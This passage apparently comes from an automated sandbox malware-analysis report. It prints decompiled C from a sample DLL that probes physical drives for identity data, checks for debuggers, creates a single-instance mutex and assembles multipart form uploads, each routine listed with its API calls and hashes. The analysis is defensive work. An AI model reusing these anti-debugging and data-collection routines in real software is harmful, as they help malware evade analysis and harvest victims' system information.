				struct _OVERLAPPED* _v1580;
				struct _OVERLAPPED* _v1584;
				struct _OVERLAPPED* _v1588;
				struct _OVERLAPPED* _v1592;
				struct _OVERLAPPED* _v1596;
				struct _OVERLAPPED* _v1600;
				struct _OVERLAPPED* _v1604;
				void _v1608;
				void* __ebp;
				int _t63;
				void* _t64;
				int _t76;
				void* _t77;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				_t97 = __esi;
				_t96 = __edi;
				_t77 = __ebx;
				_v12 = 0;
				_v16 = _a4;
				_v1584 = 0;
				_v1580 = 0;
				do {
					wsprintfW( &_v540, L"\\\\.\\PhysicalDrive%d", _v12);
					_t99 = _t99 + 0xc;
					_v24 = CreateFileW( &_v540, 0xc0000000, 7, 0, 3, 0, 0);
					if(_v24 != 0xffffffff) {
						_v1572 = 0;
						_v1608 = 0;
						_v1604 = 0;
						_v1600 = 0;
						_v1596 = 0;
						_v1592 = 0;
						_v1588 = 0;
						_t63 = DeviceIoControl(_v24, 0x74080, 0, 0,  &_v1608, 0x18,  &_v1572, 0);
						__eflags = _t63;
						if(_t63 != 0) {
							_t64 = L1000CE56(_t77,  &_v1608, _t96, _t97, 0x221);
							_t100 = _t99 + 4;
							_v8 = _t64;
							 *((char*)(_v8 + 0xa)) = 0xec;
							_v1568 = 0;
							__eflags = DeviceIoControl(_v24, 0x7c088, _v8, 0x21, _v8, 0x221,  &_v1568, 0);
							if(__eflags == 0) {
								L10:
								CloseHandle(_v24);
								_push(_v8);
								E1000CA30(_t77, _t96, _t97, __eflags);
								_t99 = _t100 + 4;
								__eflags = _v1584;
								if(_v1584 == 0) {
									_v12 = _v1580;
									goto L13;
								}
								break;
							}
							_v20 = 0;
							do {
								 *(_t98 + _v20 * 4 - 0x618) =  *(_v8 + 0x10 + _v20 * 2) & 0x0000ffff;
								_v20 = _v20 + 1;
								__eflags = _v20 - 0x100;
							} while (_v20 < 0x100);
							_v1576 = E1001CD70( &_v1564);
							_t76 = E1001CFA0(_v1576, 0x104, _v16);
							_t100 = _t100 + 0x10;
							__eflags = _t76;
							if(__eflags == 0) {
								_v1584 = 1;
							}
							goto L10;
						}
						goto L13;
					}
					L13:
					_v12 =  &(_v12->Internal);
					_v1580 = _v12;
				} while (_v12 < 4);
				return _v1584;
			}































                                                                                                                                                0x1001d370
                                                                                                                                                0x1001d370
                                                                                                                                                0x1001d370
                                                                                                                                                0x1001d379
                                                                                                                                                0x1001d383
                                                                                                                                                0x1001d386
                                                                                                                                                0x1001d390
                                                                                                                                                0x1001d39a
                                                                                                                                                0x1001d3aa
                                                                                                                                                0x1001d3b0
                                                                                                                                                0x1001d3cf
                                                                                                                                                0x1001d3d6
                                                                                                                                                0x1001d3dd
                                                                                                                                                0x1001d3e7
                                                                                                                                                0x1001d3f1
                                                                                                                                                0x1001d3fb
                                                                                                                                                0x1001d405
                                                                                                                                                0x1001d40f
                                                                                                                                                0x1001d419
                                                                                                                                                0x1001d442
                                                                                                                                                0x1001d448
                                                                                                                                                0x1001d44a
                                                                                                                                                0x1001d456
                                                                                                                                                0x1001d45b
                                                                                                                                                0x1001d45e
                                                                                                                                                0x1001d464
                                                                                                                                                0x1001d468
                                                                                                                                                0x1001d499
                                                                                                                                                0x1001d49b
                                                                                                                                                0x1001d506
                                                                                                                                                0x1001d50a
                                                                                                                                                0x1001d513
                                                                                                                                                0x1001d514
                                                                                                                                                0x1001d519
                                                                                                                                                0x1001d51c
                                                                                                                                                0x1001d523
                                                                                                                                                0x1001d52d
                                                                                                                                                0x00000000
                                                                                                                                                0x1001d52d
                                                                                                                                                0x00000000
                                                                                                                                                0x1001d525
                                                                                                                                                0x1001d49d
                                                                                                                                                0x1001d4a4
                                                                                                                                                0x1001d4b2
                                                                                                                                                0x1001d4bf
                                                                                                                                                0x1001d4c2
                                                                                                                                                0x1001d4c2
                                                                                                                                                0x1001d4da
                                                                                                                                                0x1001d4f0
                                                                                                                                                0x1001d4f5
                                                                                                                                                0x1001d4f8
                                                                                                                                                0x1001d4fa
                                                                                                                                                0x1001d4fc
                                                                                                                                                0x1001d4fc
                                                                                                                                                0x00000000
                                                                                                                                                0x1001d4fa
                                                                                                                                                0x00000000
                                                                                                                                                0x1001d44c
                                                                                                                                                0x1001d530
                                                                                                                                                0x1001d536
                                                                                                                                                0x1001d53c
                                                                                                                                                0x1001d542
                                                                                                                                                0x1001d555

                                                                                                                                                APIs
                                                                                                                                                • wsprintfW.USER32 ref: 1001D3AA
                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000), ref: 1001D3C9
                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 1001D442
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ControlCreateDeviceFilewsprintf
                                                                                                                                                • String ID: \\.\PhysicalDrive%d
                                                                                                                                                • API String ID: 3081802084-2935326385
                                                                                                                                                • Opcode ID: 2fadef59205d778281ae9fe9edf870ac3f4638ab99f78137041e2ce31b984e5b
                                                                                                                                                • Instruction ID: c19dd4f4148ea860b5569224362e113c716c363f4a93641ea984967bd2cc70da
                                                                                                                                                • Opcode Fuzzy Hash: 2fadef59205d778281ae9fe9edf870ac3f4638ab99f78137041e2ce31b984e5b
                                                                                                                                                • Instruction Fuzzy Hash: E9513EB4D00318ABEB10DF94DC95BDEB7B5EB84304F108198E509AB280D7B6AA94CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1000EFFC, Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                			E1000EFFC(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x103322d8; // 0xad297f5f
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10333a58 = _t6;
				 *0x10333a54 = _t22;
				 *0x10333a50 = _t25;
				 *0x10333a4c = _t21;
				 *0x10333a48 = _t27;
				 *0x10333a44 = _t26;
				 *0x10333a70 = ss;
				 *0x10333a64 = cs;
				 *0x10333a40 = ds;
				 *0x10333a3c = es;
				 *0x10333a38 = fs;
				 *0x10333a34 = gs;
				asm("pushfd");
				_pop( *0x10333a68);
				 *0x10333a5c =  *_t31;
				 *0x10333a60 = _v0;
				 *0x10333a6c =  &_a4;
				 *0x103339a8 = 0x10001;
				_t11 =  *0x10333a60; // 0x0
				 *0x1033395c = _t11;
				 *0x10333950 = 0xc0000409;
				 *0x10333954 = 1;
				_t12 =  *0x103322d8; // 0xad297f5f
				_v812 = _t12;
				_t13 =  *0x103322dc; // 0x52d680a0
				_v808 = _t13;
				 *0x103339a0 = IsDebuggerPresent();
				_push(1);
				E10013A5E(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x10023b34);
				if( *0x103339a0 == 0) {
					_push(1);
					E10013A5E(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                0x1000effc
                                                                                                                                                0x1000effc
                                                                                                                                                0x1000effc
                                                                                                                                                0x1000effc
                                                                                                                                                0x1000effc
                                                                                                                                                0x1000effc
                                                                                                                                                0x1000effc
                                                                                                                                                0x1000f002
                                                                                                                                                0x1000f004
                                                                                                                                                0x1000f004
                                                                                                                                                0x10016115
                                                                                                                                                0x1001611a
                                                                                                                                                0x10016120
                                                                                                                                                0x10016126
                                                                                                                                                0x1001612c
                                                                                                                                                0x10016132
                                                                                                                                                0x10016138
                                                                                                                                                0x1001613f
                                                                                                                                                0x10016146
                                                                                                                                                0x1001614d
                                                                                                                                                0x10016154
                                                                                                                                                0x1001615b
                                                                                                                                                0x10016162
                                                                                                                                                0x10016163
                                                                                                                                                0x1001616c
                                                                                                                                                0x10016174
                                                                                                                                                0x1001617c
                                                                                                                                                0x10016187
                                                                                                                                                0x10016191
                                                                                                                                                0x10016196
                                                                                                                                                0x1001619b
                                                                                                                                                0x100161a5
                                                                                                                                                0x100161af
                                                                                                                                                0x100161b4
                                                                                                                                                0x100161ba
                                                                                                                                                0x100161bf
                                                                                                                                                0x100161cb
                                                                                                                                                0x100161d0
                                                                                                                                                0x100161d2
                                                                                                                                                0x100161da
                                                                                                                                                0x100161e5
                                                                                                                                                0x100161f2
                                                                                                                                                0x100161f4
                                                                                                                                                0x100161f6
                                                                                                                                                0x100161fb
                                                                                                                                                0x1001620f

                                                                                                                                                APIs
                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 100161C5
                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100161DA
                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(10023B34), ref: 100161E5
                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 10016201
                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 10016208
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                • Opcode ID: 469b891285ebbef8cb1b1fd3885dfcaa8d07e7beac247f7a81ea467a82630b0a
                                                                                                                                                • Instruction ID: 7a4982afc0af0121ee83e1bbc930dedb521e4c826244c77e9c1cc9287b5788a2
                                                                                                                                                • Opcode Fuzzy Hash: 469b891285ebbef8cb1b1fd3885dfcaa8d07e7beac247f7a81ea467a82630b0a
                                                                                                                                                • Instruction Fuzzy Hash: 0A21CCB4901264EFE700DF29DCC86447BA8FB88311F50D11AE98D8AB62E7B499C5CF02
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001A0F0, Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001A0F0(CHAR* _a4) {
				struct _SECURITY_DESCRIPTOR _v24;
				void* _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				int _v44;

				_v44 = 0;
				_v28 = 0;
				InitializeSecurityDescriptor( &_v24, 1);
				SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
				_v40.nLength = 0xc;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor =  &_v24;
				_v28 = CreateMutexA( &_v40, 0, _a4);
				if(_v28 != 0 && GetLastError() == 0xb7) {
					_v44 = 1;
				}
				return _v44;
			}







                                                                                                                                                0x1001a0f6
                                                                                                                                                0x1001a0fd
                                                                                                                                                0x1001a10a
                                                                                                                                                0x1001a11a
                                                                                                                                                0x1001a120
                                                                                                                                                0x1001a127
                                                                                                                                                0x1001a131
                                                                                                                                                0x1001a144
                                                                                                                                                0x1001a14b
                                                                                                                                                0x1001a15a
                                                                                                                                                0x1001a15a
                                                                                                                                                0x1001a167

                                                                                                                                                APIs
                                                                                                                                                • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1001A10A
                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 1001A11A
                                                                                                                                                • CreateMutexA.KERNEL32(0000000C,00000000,10020584), ref: 1001A13E
                                                                                                                                                • GetLastError.KERNEL32 ref: 1001A14D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4085719312-0
                                                                                                                                                • Opcode ID: 85a6fd12354dd419dd0ef30a81820dc56bd3bdf0a7a4bd4704583f47520dfa93
                                                                                                                                                • Instruction ID: 94a843d0d969dde2b410f28b1faa04b0eb5ecf9004c44cc09fbfa4c27db3ef7e
                                                                                                                                                • Opcode Fuzzy Hash: 85a6fd12354dd419dd0ef30a81820dc56bd3bdf0a7a4bd4704583f47520dfa93
                                                                                                                                                • Instruction Fuzzy Hash: 5A01BF70900309DFEB10DF90C999BDEBBB4EB08705F604504E605B6290D7B59A85CBB5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 10019FF0, Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                			E10019FF0(void* __ecx) {
				char _v8;

				__imp__CheckRemoteDebuggerPresent(GetCurrentProcess(),  &_v8, __ecx);
				return _v8;
			}




                                                                                                                                                0x10019fff
                                                                                                                                                0x1001a00b

                                                                                                                                                APIs
                                                                                                                                                • GetCurrentProcess.KERNEL32(00000001,?,?,1001A032,?,?,1001A0C0), ref: 10019FF8
                                                                                                                                                • CheckRemoteDebuggerPresent.KERNEL32(00000000,?,?,1001A032,?,?,1001A0C0), ref: 10019FFF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CheckCurrentDebuggerPresentProcessRemote
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3244773808-0
                                                                                                                                                • Opcode ID: 8cf1fe81f6f864816b257ae7aa1445d5809d52eafb48723ac30665233529113e
                                                                                                                                                • Instruction ID: 1968f35720b6d0cf004a0d8eaef2a233a09a3f8537d50a9d5b5f9af22a971398
                                                                                                                                                • Opcode Fuzzy Hash: 8cf1fe81f6f864816b257ae7aa1445d5809d52eafb48723ac30665233529113e
                                                                                                                                                • Instruction Fuzzy Hash: DDC0127680020CBBCB00DBE0CC8C88AB7ACEA08211B200185F909C3200DA32AA088AA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 10021460, Relevance: 48.4, APIs: 32, Instructions: 449COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                			E10021460(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36) {
				char _v8;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v543;
				char _v544;
				char _v807;
				char _v808;
				char* _v812;
				char _v1079;
				char _v1080;
				char* _v1084;
				char* _v1088;
				char _v1599;
				char _v1600;
				intOrPtr _v1604;
				char _v15703;
				char _v15704;
				char* _v15708;
				char _v29807;
				char _v29808;
				char* _v29812;
				char _v43911;
				char _v43912;
				char _v58007;
				char _v58008;
				char _v58024;
				char _v58052;
				char _v58080;
				char _v58084;
				void* __esi;
				void* _t172;
				intOrPtr _t179;
				void* _t186;
				void* _t195;
				void* _t216;
				void* _t218;
				void* _t237;
				void* _t254;
				intOrPtr _t297;
				intOrPtr _t357;
				void* _t359;
				void* _t366;
				void* _t376;
				void* _t385;
				void* _t392;

				_t353 = __edi;
				_t265 = __ebx;
				_push(0xffffffff);
				_push(E10022B1C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t357;
				E10018AA0(0xe2d4);
				_push(_t354);
				_v24 = 0;
				_v28 = "--";
				if(_a16 != 0 && _a20 != 0 && _a24 != 0 && _a28 != 0 && _a32 > 0) {
					_v812 = "Content-Disposition: form-data; name=\"%s\"; %s=\"%s\"";
					_v1084 = "Content-Type: %s";
					_v1088 = "%s%s\r\n%s\r\n%s\r\n\r\n";
					_v808 = 0;
					E1000CF20(__edi,  &_v807, 0, 0x103);
					_v1080 = 0;
					E1000CF20(_t353,  &_v1079, 0, 0x103);
					_v1600 = 0;
					E1000CF20(_t353,  &_v1599, 0, 0x1ff);
					_push(_a20);
					_push(_a16);
					E1000CC93(_t353,  &_v808, _v812, _a16);
					E1000CC93(_t353,  &_v1080, _v1084, _a24);
					_push( &_v1080);
					_push( &_v808);
					_push(_a4);
					E1000CC93(_t353,  &_v1600, _v1088, _v28);
					_t392 = _t357 + 0x5c;
					if( *_a36 != 0) {
						E1000D190(__ebx, _t353, _t354,  *_a36 + _v24,  &_v1600, E1000CAC0( &_v1600));
						_t392 = _t392 + 0x10;
					}
					_t254 = E1000CAC0( &_v1600);
					_t357 = _t392 + 4;
					_v24 = _t254 + _v24;
					if( *_a36 != 0) {
						E1000D190(_t265, _t353, _t354,  *_a36 + _v24, _a28, _a32);
						_t357 = _t357 + 0xc;
					}
					_v24 = _v24 + _a32;
				}
				if(_a8 != 0 && _a12 > 0) {
					_t172 = E10001A50(_a8, "=");
					_t357 = _t357 + 8;
					if(_t172 != 0) {
						_v15708 = "Content-Disposition: form-data; name=\"%s\"";
						_v29812 = "\r\n%s%s\r\n%s\r\n\r\n%s";
						_v58008 = 0;
						E1000CF20(_t353,  &_v58007, 0, 0x370f);
						_v29808 = 0;
						E1000CF20(_t353,  &_v29807, 0, 0x370f);
						_v43912 = 0;
						E1000CF20(_t353,  &_v43911, 0, 0x370f);
						_v15704 = 0;
						E1000CF20(_t353,  &_v15703, 0, 0x370f);
						_t179 = E10001A50(_a8, "&");
						_t366 = _t357 + 0x38;
						_v1604 = _t179;
						if(_v1604 != 0) {
							E10001160( &_v58052, __eflags, _a8);
							_v8 = 0;
							E10002FE0( &_v58024, __eflags);
							_v8 = 1;
							E10001160( &_v58080, __eflags, "&");
							_v8 = 2;
							E1001A850(__eflags,  &_v58052,  &_v58024,  &_v58080);
							_t357 = _t366 + 0xc;
							_v58084 = 0;
							while(1) {
								_t186 = E100021E0( &_v58024);
								__eflags = _v58084 - _t186;
								if(_v58084 >= _t186) {
									break;
								}
								E1000CF20(_t353,  &_v43912, 0, 0x3710);
								E1000CF20(_t353,  &_v15704, 0, 0x3710);
								_t195 = E10001A50(E100011E0(E10003030( &_v58024, __eflags, _v58084)), "=");
								_t354 = _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084));
								E1000D190(_t265, _t353, _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084)),  &_v43912, E100011E0(E10003030( &_v58024, __eflags, _v58084)), _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084)));
								E1000D8A3(_v58084,  &_v15704, 0x3710, E10001A50(E100011E0(E10003030( &_v58024, __eflags, _v58084)), "=") + 1);
								E1000CF20(_t353,  &_v58008, 0, 0x3710);
								E1000CF20(_t353,  &_v29808, 0, 0x3710);
								E1000CC93(_t353,  &_v58008, _v15708,  &_v43912);
								_push( &_v15704);
								_push( &_v58008);
								_push(_a4);
								E1000CC93(_t353,  &_v29808, _v29812, _v28);
								_t376 = _t357 + 0x7c;
								__eflags =  *_a36;
								if( *_a36 != 0) {
									_t218 = E1000CAC0( &_v29808);
									__eflags =  *_a36 + _v24;
									E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, _t218);
									_t376 = _t376 + 0x10;
								}
								_t216 = E1000CAC0( &_v29808);
								_t357 = _t376 + 4;
								_v24 = _t216 + _v24;
								_t297 = _v58084 + 1;
								__eflags = _t297;
								_v58084 = _t297;
							}
							_v8 = 1;
							E100011A0( &_v58080);
							_v8 = 0;
							E10003010( &_v58024);
							_v8 = 0xffffffff;
							E100011A0( &_v58052);
						} else {
							E1000D190(_t265, _t353, _t354,  &_v43912, _a8, E10001A50(_a8, "=") - _a8);
							E1000D8A3(_a8,  &_v15704, 0x3710, E10001A50(_a8, "=") + 1);
							E1000CF20(_t353,  &_v58008, 0, 0x3710);
							E1000CF20(_t353,  &_v29808, 0, 0x3710);
							E1000CC93(_t353,  &_v58008, _v15708,  &_v43912);
							_push( &_v15704);
							_push( &_v58008);
							_push(_a4);
							E1000CC93(_t353,  &_v29808, _v29812, _v28);
							_t385 = _t366 + 0x64;
							if( *_a36 != 0) {
								E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, E1000CAC0( &_v29808));
								_t385 = _t385 + 0x10;
							}
							_t237 = E1000CAC0( &_v29808);
							_t357 = _t385 + 4;
							_v24 = _t237 + _v24;
						}
					}
				}
				_v20 = "\r\n%s%s%s\r\n";
				_v544 = 0;
				E1000CF20(_t353,  &_v543, 0, 0x1ff);
				_push(_v28);
				_push(_a4);
				E1000CC93(_t353,  &_v544, _v20, _v28);
				_t359 = _t357 + 0x20;
				if( *_a36 != 0) {
					E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v544, E1000CAC0( &_v544));
					_t359 = _t359 + 0x10;
				}
				_v24 = E1000CAC0( &_v544) + _v24;
				 *[fs:0x0] = _v16;
				return _v24;
			}


















































                                                                                                                                                0x10021460
                                                                                                                                                0x10021460
                                                                                                                                                0x10021463
                                                                                                                                                0x10021465
                                                                                                                                                0x10021470
                                                                                                                                                0x10021471
                                                                                                                                                0x1002147d
                                                                                                                                                0x10021482
                                                                                                                                                0x10021483
                                                                                                                                                0x1002148a
                                                                                                                                                0x10021495
                                                                                                                                                0x100214c3
                                                                                                                                                0x100214cd
                                                                                                                                                0x100214d7
                                                                                                                                                0x100214e1
                                                                                                                                                0x100214f6
                                                                                                                                                0x100214fe
                                                                                                                                                0x10021513
                                                                                                                                                0x1002151b
                                                                                                                                                0x10021530
                                                                                                                                                0x1002153b
                                                                                                                                                0x1002153f
                                                                                                                                                0x10021552
                                                                                                                                                0x1002156c
                                                                                                                                                0x1002157a
                                                                                                                                                0x10021581
                                                                                                                                                0x10021585
                                                                                                                                                0x10021598
                                                                                                                                                0x1002159d
                                                                                                                                                0x100215a6
                                                                                                                                                0x100215c8
                                                                                                                                                0x100215cd
                                                                                                                                                0x100215cd
                                                                                                                                                0x100215d7
                                                                                                                                                0x100215dc
                                                                                                                                                0x100215e2
                                                                                                                                                0x100215eb
                                                                                                                                                0x100215fe
                                                                                                                                                0x10021603
                                                                                                                                                0x10021603
                                                                                                                                                0x1002160c
                                                                                                                                                0x1002160c
                                                                                                                                                0x10021613
                                                                                                                                                0x1002162c
                                                                                                                                                0x10021631
                                                                                                                                                0x10021636
                                                                                                                                                0x1002163c
                                                                                                                                                0x10021646
                                                                                                                                                0x10021650
                                                                                                                                                0x10021665
                                                                                                                                                0x1002166d
                                                                                                                                                0x10021682
                                                                                                                                                0x1002168a
                                                                                                                                                0x1002169f
                                                                                                                                                0x100216a7
                                                                                                                                                0x100216bc
                                                                                                                                                0x100216cd
                                                                                                                                                0x100216d2
                                                                                                                                                0x100216d5
                                                                                                                                                0x100216e2
                                                                                                                                                0x10021802
                                                                                                                                                0x10021807
                                                                                                                                                0x10021814
                                                                                                                                                0x10021819
                                                                                                                                                0x10021828
                                                                                                                                                0x1002182d
                                                                                                                                                0x10021846
                                                                                                                                                0x1002184b
                                                                                                                                                0x1002184e
                                                                                                                                                0x10021869
                                                                                                                                                0x1002186f
                                                                                                                                                0x10021874
                                                                                                                                                0x1002187a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1002188e
                                                                                                                                                0x100218a4
                                                                                                                                                0x100218cb
                                                                                                                                                0x100218ee
                                                                                                                                                0x10021912
                                                                                                                                                0x10021951
                                                                                                                                                0x10021967
                                                                                                                                                0x1002197d
                                                                                                                                                0x1002199a
                                                                                                                                                0x100219a8
                                                                                                                                                0x100219af
                                                                                                                                                0x100219b3
                                                                                                                                                0x100219c6
                                                                                                                                                0x100219cb
                                                                                                                                                0x100219d1
                                                                                                                                                0x100219d4
                                                                                                                                                0x100219dd
                                                                                                                                                0x100219f2
                                                                                                                                                0x100219f6
                                                                                                                                                0x100219fb
                                                                                                                                                0x100219fb
                                                                                                                                                0x10021a05
                                                                                                                                                0x10021a0a
                                                                                                                                                0x10021a10
                                                                                                                                                0x10021860
                                                                                                                                                0x10021860
                                                                                                                                                0x10021863
                                                                                                                                                0x10021863
                                                                                                                                                0x10021a18
                                                                                                                                                0x10021a22
                                                                                                                                                0x10021a27
                                                                                                                                                0x10021a31
                                                                                                                                                0x10021a36
                                                                                                                                                0x10021a43
                                                                                                                                                0x100216e8
                                                                                                                                                0x10021708
                                                                                                                                                0x10021731
                                                                                                                                                0x10021747
                                                                                                                                                0x1002175d
                                                                                                                                                0x1002177a
                                                                                                                                                0x10021788
                                                                                                                                                0x1002178f
                                                                                                                                                0x10021793
                                                                                                                                                0x100217a6
                                                                                                                                                0x100217ab
                                                                                                                                                0x100217b4
                                                                                                                                                0x100217d6
                                                                                                                                                0x100217db
                                                                                                                                                0x100217db
                                                                                                                                                0x100217e5
                                                                                                                                                0x100217ea
                                                                                                                                                0x100217f0
                                                                                                                                                0x100217f0
                                                                                                                                                0x100216e2
                                                                                                                                                0x10021636
                                                                                                                                                0x10021a48
                                                                                                                                                0x10021a4f
                                                                                                                                                0x10021a64
                                                                                                                                                0x10021a6f
                                                                                                                                                0x10021a73
                                                                                                                                                0x10021a83
                                                                                                                                                0x10021a88
                                                                                                                                                0x10021a91
                                                                                                                                                0x10021ab3
                                                                                                                                                0x10021ab8
                                                                                                                                                0x10021ab8
                                                                                                                                                0x10021acd
                                                                                                                                                0x10021ad6
                                                                                                                                                0x10021ae1

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$_sprintf_strlen$_strcpy_s$__flsbuf__output_l
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 854390245-0
                                                                                                                                                • Opcode ID: 910685c5451b4cc4cbd4e9e1085cb89c7aa0c32abf0c4b0acda8ecd3dc8b06fe
                                                                                                                                                • Instruction ID: 2d82e108429a1e59b14db5b6321f6623d8f234d0aa847db4e2dbab4e051ccd9c
                                                                                                                                                • Opcode Fuzzy Hash: 910685c5451b4cc4cbd4e9e1085cb89c7aa0c32abf0c4b0acda8ecd3dc8b06fe
                                                                                                                                                • Instruction Fuzzy Hash: BC0290B6D00218ABDB10DB90DC82FDE777DEB58340F4445A8F509A7285EB74AB44CFA2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 100133E0, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 91%
